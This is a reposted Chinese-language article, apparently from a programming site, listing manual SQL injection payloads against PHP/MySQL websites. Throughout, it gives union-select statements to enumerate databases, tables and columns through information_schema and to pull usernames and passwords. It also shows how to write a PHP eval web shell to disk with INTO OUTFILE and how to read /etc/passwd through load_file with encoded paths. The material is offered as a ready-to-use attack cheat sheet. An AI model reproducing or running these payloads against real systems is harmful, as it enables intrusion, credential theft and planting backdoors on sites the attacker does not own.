PHP+MySQL 手工注入語句大全推薦

2020-03-24 16:07:46

字體：大中小

來源：轉載

供稿：網友

我PHP手工太菜了，無奈只能補下PHPMYSQL手工注射，把收集總結的資料分享下。FTP　　暴字段長度　　Orderbynum/*　　匹配字段　　and1=1unionselect1,2,3,4,5…….n/*　　暴字段位置　　and1=2unionselect1,2,3,4,5…..n/*　　利用內置函數暴數據庫信息　　version()database()user()　　不用猜解可用字段暴數據庫信息(有些網站不適用):　　and1=2unionallselectversion()/*　　and1=2unionallselectdatabase()/*　　and1=2unionallselectuser()/*　　操作系統(tǒng)信息：　　and1=2unionallselect@@global.version_compile_osfrommysql.user/*　　數據庫權限：　　andord(mid(user(),1,1))=114/*返回正常說明為root　　暴庫(mysql>5.0)　　Mysql5以上有內置庫information_schema，存儲著mysql的所有數據庫和表結構信息　　and1=2unionselect1,2,3,SCHEMA_NAME,5,6,7,8,9,10frominformation_schema.SCHEMATAlimit0,1　　猜表　　and1=2unionselect1,2,3,TABLE_NAME,5,6,7,8,9,10frominformation_schema.TABLESwhereTABLE_SCHEMA=數據庫（十六進制）limit0（開始的記錄，0為第一個開始記錄）,1（顯示1條記錄）—　　猜字段　　and1=2Unionselect1,2,3,COLUMN_NAME,5,6,7,8,9,10frominformation_schema.COLUMNSwhereTABLE_NAME=表名（十六進制）limit0,1　　暴密碼　　and1=2Unionselect1,2,3,用戶名段,5,6,7,密碼段,8,9from表名limit0,1　　高級用法（一個可用字段顯示兩個數據內容）：　　Unionselect1,2,3concat(用戶名段,0x3c,密碼段),5,6,7,8,9from表名limit0,1　　直接寫馬(Root權限)　　條件：1、知道站點物理路徑　　2、有足夠大的權限（可以用select….frommysql.user測試）　　3、magic_quotes_gpc()=OFF　　select‘<?phpeval($_POST[cmd])?>'intooutfile‘物理路徑'　　and1=2unionallselect一句話HEX值intooutfile'路徑'　　load_file()常用路徑：　　1、replace(load_file(0×2F6574632F706173737764),0×3c,0×20)　　2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))　　上面兩個是查看一個PHP文件里完全顯示代碼.有些時候不替換一些字符,如“<”替換成”空格”返回的是網頁.而無法查看到代碼.

鄭重聲明：本文版權歸原作者所有，轉載文章僅為傳播更多信息之目的，如作者信息標記有誤，請第一時間聯系我們修改或刪除，多謝。

上一篇：phpmyadmin1045錯誤

下一篇：phpamqp消息隊列RabbitMQ交換器類型廣播fanout(四)